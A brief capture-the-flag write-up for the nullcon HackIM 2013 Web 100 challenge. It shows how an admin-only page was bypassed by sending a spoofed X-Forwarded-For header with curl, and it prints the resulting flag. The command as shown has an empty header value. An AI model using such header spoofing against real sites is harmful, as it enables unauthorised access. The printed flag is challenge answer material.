.. title: HackIM 2013 - Web 100 WriteUp .. slug: hackim-2013-web-100-writeup .. date: 2013/02/05 23:22:38 .. tags: CTF, nullcon, HackIM, WriteUps .. link: .. description: WriteUp for nullcon HackIM CTF Web 100. Web Security questions, ranging from 1 to 5 are the first category in HackIM. But it isn't neccessary to solve them first before others. So the challenge is presented as: .. image:: /galleries/Selection_075.png :scale: 50 It's clear that the **Admin Console** was meant for us. So we clicked on it! But BAM! This showed up, .. image:: /galleries/Selection_076.png :scale: 50 That's bad isn't? Well, do some *googling*, as usual about *stackoverflow hacking* cases, and you'd have come across this; `Anatomy of an Attack: How I Hacked StackOverflow `_. From the blog post, you'd see that the author mentions not to rely upon **X-Forwarded-For** for anything. Well, there's a hint isn't it. ;) So, how do we go about hacking that challenge then? It's pretty simple, and most Linux distros already have it by default.... ...drum roll please... Mr. **curl** :D So here is what we did you exploit it:: ~$ curl --header "X-Forwarded-For:" http://ctf.nullcon.net/challenges/web/web1/getflag.php After that it will print out:: ~$ The Flag is DholuBholuareTWINS Sweet!? :D